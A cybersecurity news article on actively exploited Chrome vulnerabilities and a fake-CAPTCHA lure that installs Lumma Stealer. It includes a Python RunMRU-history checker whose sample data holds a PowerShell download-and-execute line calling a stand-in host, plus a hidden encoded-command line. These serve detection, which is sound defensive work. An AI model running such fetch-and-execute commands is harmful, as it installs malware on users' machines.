
Sun Sep 15 11:31:43 UTC 2024
## Chrome Users Face Double Whammy: Exploited Vulnerabilities and New CAPTCHA Attack
**September 16, 2024** – Google Chrome users have just 72 hours to update their browser to patch two critical vulnerabilities actively exploited by attackers, including a North Korean hacking group.
**Vulnerability Deadline Looms**
Two memory vulnerabilities, CVE-2024-7971 and CVE-2024-7965, were discovered in August and have been actively exploited by cybercriminals. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has mandated all federal employees update their Chrome browsers by September 16th to mitigate the threat.
**Beyond Vulnerabilities: A New CAPTCHA Attack**
While Chrome users rush to update, a new phishing attack targeting Google login credentials is gaining traction. This attack, first identified by OALABS Research, uses “kiosk mode” to trap users in a full-screen Google login page, forcing them to enter their credentials. Once entered, these credentials are then stolen by malware.
**Fake CAPTCHA Trickery**
Adding to the threat, researchers at Palo Alto Networks have discovered a fake CAPTCHA attack using malicious PowerShell scripts to install the Lumma Stealer malware. This malware steals user credentials, crypto wallets, and other sensitive information. The fake CAPTCHA encourages users to paste a malicious PowerShell script into a Run window, leading to the download and execution of the Lumma Stealer.
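
A defender-side check for the Run-window paste described above, as an added example that is not part of the original article: Windows records each user's Run dialog history under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, so exported values can be triaged for PowerShell launches. The sample values, the `flag_run_entries` function and the indicator patterns are constructed for illustration and are not Lumma Stealer signatures.

```python
import re

# Constructed sample of RunMRU values (Windows appends "\1" to each Run entry);
# MRUList gives most-recent-first order. Not taken from a real incident.
SAMPLE_RUNMRU = {
    "a": "cmd\\1",
    "b": "notepad C:\\Users\\alice\\notes.txt\\1",
    "c": "powershell -w hidden -enc <BASE64_PLACEHOLDER>\\1",
    "d": "PowerShell.exe -NoP iex (iwr https://example.invalid/verify.txt)\\1",
    "e": "powershell\\1",
    "MRUList": "dcbae",
}

# Heuristic indicators: assumptions for this example, not a vendor signature.
INTERPRETER = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)
INDICATORS = {
    "hidden_window": re.compile(r"(?<!\S)-w(i\w*)?\s+hid\w*", re.I),
    "encoded_command": re.compile(r"(?<!\S)-(e|ec|en\w*)\s+\S", re.I),
    "download_or_exec": re.compile(
        r"\b(iex|invoke-expression|iwr|invoke-webrequest|irm|"
        r"invoke-restmethod|downloadstring|downloadfile)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}

def flag_run_entries(runmru):
    """Return (value name, command, indicator names) for suspicious entries,
    most recently used first."""
    order = runmru.get("MRUList", "")
    # Follow MRUList, then any values it does not mention.
    names = list(order) + sorted(
        k for k in runmru if k != "MRUList" and k not in order)
    findings = []
    for name in names:
        raw = runmru.get(name)
        if raw is None:
            continue  # MRUList can reference a value that was deleted
        command = raw[:-2] if raw.endswith("\\1") else raw
        if not INTERPRETER.search(command):
            continue  # only PowerShell launches are in scope here
        hits = [label for label, rx in INDICATORS.items() if rx.search(command)]
        if hits:  # a bare "powershell" with no indicator is not flagged
            findings.append((name, command, hits))
    return findings

if __name__ == "__main__":
    for name, command, hits in flag_run_entries(SAMPLE_RUNMRU):
        print(f"RunMRU value {name!r}: {', '.join(hits)} -> {command}")
```

A hit only shows that such a command was typed or pasted into Run under that user profile; the history can be cleared, so an empty result does not rule the lure out.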
**Staying Safe**
Chrome users are urged to update their browser immediately to protect themselves from the exploited vulnerabilities. Additionally, be wary of any unusual CAPTCHA prompts or requests to run scripts. If you suspect an attack, close the browser window and restart your PC. Regularly run antivirus scans and keep your operating system and software up to date.
**The Bottom Line:**
Cybersecurity threats are constantly evolving. It’s crucial to stay informed and proactive. Follow these tips and keep your digital life safe.